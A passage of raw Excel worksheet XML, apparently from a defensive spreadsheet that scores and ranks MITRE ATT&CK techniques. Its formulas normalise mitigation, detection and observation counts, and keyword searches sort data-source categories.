        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>303.66947217460313</v>
      </c>
      <c r="AR346" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS346" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT346" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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47" spans="1:47" ht="51">
      <c r="A347" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B347" s="37">
        <f t="shared" si="5"/>
        <v>183.06666666666666</v>
      </c>
      <c r="C347" s="37" t="s">
        <v>1218</v>
      </c>
      <c r="D347" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E347" s="37" t="s">
        <v>1219</v>
      </c>
      <c r="F347" s="37">
        <v>1</v>
      </c>
      <c r="G347" s="37">
        <v>1</v>
      </c>
      <c r="H347" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I347" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J347" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K347" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L347" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M347" s="37">
        <v>0</v>
      </c>
      <c r="N347" s="56">
        <v>1</v>
      </c>
      <c r="O347" s="56">
        <v>3</v>
      </c>
      <c r="P347" s="56">
        <v>0</v>
      </c>
      <c r="Q347" s="56">
        <v>3</v>
      </c>
      <c r="R347" s="57"/>
      <c r="S347" s="57">
        <v>0</v>
      </c>
      <c r="T347" s="57"/>
      <c r="U347" s="57">
        <v>0</v>
      </c>
      <c r="V347" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W347" s="37">
        <v>0</v>
      </c>
      <c r="X347" s="37">
        <v>0</v>
      </c>
      <c r="Y347" s="37">
        <v>0</v>
      </c>
      <c r="Z347" s="37">
        <v>7</v>
      </c>
      <c r="AA347" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB347" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC347" s="37"/>
      <c r="AD347" s="50" t="s">
        <v>1220</v>
      </c>
      <c r="AE347" s="37" t="str" cm="1">
        <f t="array" ref="AE347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD347)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF347" s="37">
        <v>343</v>
      </c>
      <c r="AG347" s="37" t="str" cm="1">
        <f t="array" ref="AG347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD347)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH347" s="37">
        <v>343</v>
      </c>
      <c r="AI347" s="37" t="str" cm="1">
        <f t="array" ref="AI347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD347)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ347" s="37">
        <v>343</v>
      </c>
      <c r="AK347" s="37" t="str" cm="1">
        <f t="array" ref="AK347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD347)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL347" s="37">
        <v>343</v>
      </c>
      <c r="AM347" s="37" t="str" cm="1">
        <f t="array" ref="AM347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD347)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN347" s="37">
        <v>0</v>
      </c>
      <c r="AO347" s="37">
        <v>0</v>
      </c>
      <c r="AP347" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ347" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>61.022222222222219</v>
      </c>
      <c r="AR347" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS347" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT347" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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48" spans="1:47" ht="51">
      <c r="A348" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B348" s="37">
        <f t="shared" si="5"/>
        <v>380.31408899999997</v>
      </c>
      <c r="C348" s="37" t="s">
        <v>1221</v>
      </c>
      <c r="D348" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E348" s="37" t="s">
        <v>1222</v>
      </c>
      <c r="F348" s="37">
        <v>1</v>
      </c>
      <c r="G348" s="37">
        <v>1</v>
      </c>
      <c r="H348" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I348" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J348" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K348" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L348" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M348" s="37">
        <v>0</v>
      </c>
      <c r="N348" s="56">
        <v>1</v>
      </c>
      <c r="O348" s="56">
        <v>4</v>
      </c>
      <c r="P348" s="56">
        <v>1</v>
      </c>
      <c r="Q348" s="56">
        <v>1</v>
      </c>
      <c r="R348" s="57" t="s">
        <v>146</v>
      </c>
      <c r="S348" s="57">
        <v>6</v>
      </c>
      <c r="T348" s="57" t="s">
        <v>1223</v>
      </c>
      <c r="U348" s="57">
        <v>9</v>
      </c>
      <c r="V348" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17619033333333334</v>
      </c>
      <c r="W348" s="37">
        <v>15</v>
      </c>
      <c r="X348" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y348" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z348" s="37">
        <v>7</v>
      </c>
      <c r="AA348" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB348" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC348" s="37"/>
      <c r="AD348" s="50" t="s">
        <v>1224</v>
      </c>
      <c r="AE348" s="37" t="str" cm="1">
        <f t="array" ref="AE348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD348)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF348" s="37">
        <v>344</v>
      </c>
      <c r="AG348" s="37" t="str" cm="1">
        <f t="array" ref="AG348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD348)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH348" s="37">
        <v>344</v>
      </c>
      <c r="AI348" s="37" t="str" cm="1">
        <f t="array" ref="AI348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD348)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ348" s="37">
        <v>344</v>
      </c>
      <c r="AK348" s="37" t="str" cm="1">
        <f t="array" ref="AK348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD348)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL348" s="37">
        <v>344</v>
      </c>
      <c r="AM348" s="37" t="str" cm="1">
        <f t="array" ref="AM348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD348)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN348" s="37">
        <v>0</v>
      </c>
      <c r="AO348" s="37">
        <v>0</v>
      </c>
      <c r="AP348" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ348" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>126.77136299999999</v>
      </c>
      <c r="AR348" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS348" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT348" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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49" spans="1:47" ht="34">
      <c r="A349" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B349" s="37">
        <f t="shared" si="5"/>
        <v>499.79080500000003</v>
      </c>
      <c r="C349" s="37" t="s">
        <v>1225</v>
      </c>
      <c r="D349" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E349" s="37" t="s">
        <v>1226</v>
      </c>
      <c r="F349" s="37">
        <v>1</v>
      </c>
      <c r="G349" s="37">
        <v>1</v>
      </c>
      <c r="H349" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I349" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J349" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K349" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L349" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M349" s="37">
        <v>0</v>
      </c>
      <c r="N349" s="56">
        <v>1</v>
      </c>
      <c r="O349" s="56">
        <v>12</v>
      </c>
      <c r="P349" s="56">
        <v>1</v>
      </c>
      <c r="Q349" s="56">
        <v>3</v>
      </c>
      <c r="R349" s="57" t="s">
        <v>314</v>
      </c>
      <c r="S349" s="57">
        <v>7</v>
      </c>
      <c r="T349" s="57" t="s">
        <v>1227</v>
      </c>
      <c r="U349" s="57">
        <v>12</v>
      </c>
      <c r="V349" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.261905</v>
      </c>
      <c r="W349" s="37">
        <v>19</v>
      </c>
      <c r="X349" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y349" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z349" s="37">
        <v>17</v>
      </c>
      <c r="AA349" s="37">
        <v>0.17</v>
      </c>
      <c r="AB349" s="37">
        <v>0.17</v>
      </c>
      <c r="AC349" s="37"/>
      <c r="AD349" s="50" t="s">
        <v>1228</v>
      </c>
      <c r="AE349" s="37" t="str" cm="1">
        <f t="array" ref="AE349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD349)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF349" s="37">
        <v>345</v>
      </c>
      <c r="AG349" s="37" t="str" cm="1">
        <f t="array" ref="AG349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD349)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH349" s="37">
        <v>345</v>
      </c>
      <c r="AI349" s="37" t="str" cm="1">
        <f t="array" ref="AI349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD349)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ349" s="37">
        <v>345</v>
      </c>
      <c r="AK349" s="37" t="str" cm="1">
        <f t="array" ref="AK349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD349)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL349" s="37">
        <v>345</v>
      </c>
      <c r="AM349" s="37" t="str" cm="1">
        <f t="array" ref="AM349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD349)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN349" s="37">
        <v>0</v>
      </c>
      <c r="AO349" s="37">
        <v>2</v>
      </c>
      <c r="AP349" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ349" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>166.596935</v>
      </c>
      <c r="AR349" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS349" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT349" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU34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7.9808064285714293</v>
      </c>
    </row>
    <row r="350" spans="1:47" ht="34">
      <c r="A350" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B350" s="37">
        <f t="shared" si="5"/>
        <v>362.7378973809524</v>
      </c>
      <c r="C350" s="37" t="s">
        <v>1229</v>
      </c>
      <c r="D350" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E350" s="37" t="s">
        <v>1230</v>
      </c>
      <c r="F350" s="37">
        <v>1</v>
      </c>
      <c r="G350" s="37">
        <v>1</v>
      </c>
      <c r="H350" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I350" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J350" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K350" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L350" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M350" s="37">
        <v>0</v>
      </c>
      <c r="N350" s="56">
        <v>0</v>
      </c>
      <c r="O350" s="56">
        <v>1</v>
      </c>
      <c r="P350" s="56">
        <v>1</v>
      </c>
      <c r="Q350" s="56">
        <v>2</v>
      </c>
      <c r="R350" s="57" t="s">
        <v>276</v>
      </c>
      <c r="S350" s="57">
        <v>7</v>
      </c>
      <c r="T350" s="57" t="s">
        <v>1231</v>
      </c>
      <c r="U350" s="57">
        <v>8</v>
      </c>
      <c r="V350" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16190461904761905</v>
      </c>
      <c r="W350" s="37">
        <v>15</v>
      </c>
      <c r="X350" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y350" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z350" s="37">
        <v>4</v>
      </c>
      <c r="AA350" s="37">
        <v>0.04</v>
      </c>
      <c r="AB350" s="37">
        <v>0.04</v>
      </c>
      <c r="AC350" s="37"/>
      <c r="AD350" s="50" t="s">
        <v>286</v>
      </c>
      <c r="AE350" s="37" t="str" cm="1">
        <f t="array" ref="AE350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD350)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF350" s="37">
        <v>346</v>
      </c>
      <c r="AG350" s="37" t="str" cm="1">
        <f t="array" ref="AG350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD350)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH350" s="37">
        <v>346</v>
      </c>
      <c r="AI350" s="37" t="str" cm="1">
        <f t="array" ref="AI350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD350)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ350" s="37">
        <v>346</v>
      </c>
      <c r="AK350" s="37" t="str" cm="1">
        <f t="array" ref="AK350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD350)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL350" s="37">
        <v>346</v>
      </c>
      <c r="AM350" s="37" t="str" cm="1">
        <f t="array" ref="AM350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD350)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN350" s="37">
        <v>0</v>
      </c>
      <c r="AO350" s="37">
        <v>0</v>
      </c>
      <c r="AP350" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ350" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>120.91263246031747</v>
      </c>
      <c r="AR350" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS350" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT350" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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51" spans="1:47" ht="34">
      <c r="A351" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B351" s="37">
        <f t="shared" si="5"/>
        <v>138.9</v>
      </c>
      <c r="C351" s="37" t="s">
        <v>1232</v>
      </c>
      <c r="D351" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E351" s="37" t="s">
        <v>1233</v>
      </c>
      <c r="F351" s="37">
        <v>1</v>
      </c>
      <c r="G351" s="37">
        <v>1</v>
      </c>
      <c r="H351" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I351" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J351" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K351" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L351" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M351" s="37">
        <v>0</v>
      </c>
      <c r="N351" s="56">
        <v>0</v>
      </c>
      <c r="O351" s="56">
        <v>0</v>
      </c>
      <c r="P351" s="56">
        <v>0</v>
      </c>
      <c r="Q351" s="56">
        <v>0</v>
      </c>
      <c r="R351" s="57"/>
      <c r="S351" s="57">
        <v>0</v>
      </c>
      <c r="T351" s="57"/>
      <c r="U351" s="57">
        <v>0</v>
      </c>
      <c r="V351" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W351" s="37">
        <v>0</v>
      </c>
      <c r="X351" s="37">
        <v>0</v>
      </c>
      <c r="Y351" s="37">
        <v>0</v>
      </c>
      <c r="Z351" s="37">
        <v>0</v>
      </c>
      <c r="AA351" s="37">
        <v>0</v>
      </c>
      <c r="AB351" s="37">
        <v>0</v>
      </c>
      <c r="AC351" s="37"/>
      <c r="AD351" s="50" t="s">
        <v>286</v>
      </c>
      <c r="AE351" s="37" t="str" cm="1">
        <f t="array" ref="AE351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD351)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF351" s="37">
        <v>347</v>
      </c>
      <c r="AG351" s="37" t="str" cm="1">
        <f t="array" ref="AG351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD351)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH351" s="37">
        <v>347</v>
      </c>
      <c r="AI351" s="37" t="str" cm="1">
        <f t="array" ref="AI351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD351)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ351" s="37">
        <v>347</v>
      </c>
      <c r="AK351" s="37" t="str" cm="1">
        <f t="array" ref="AK351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD351)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL351" s="37">
        <v>347</v>
      </c>
      <c r="AM351" s="37" t="str" cm="1">
        <f t="array" ref="AM351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD351)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN351" s="37">
        <v>0</v>
      </c>
      <c r="AO351" s="37">
        <v>0</v>
      </c>
      <c r="AP351" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ351" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>46.300000000000004</v>
      </c>
      <c r="AR351" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS351" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT351" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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52" spans="1:47" ht="51">
      <c r="A352" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B352" s="37">
        <f t="shared" si="5"/>
        <v>391.3669983333333</v>
      </c>
      <c r="C352" s="37" t="s">
        <v>1234</v>
      </c>
      <c r="D352" s="50" t="s">
        <v>1215</v>
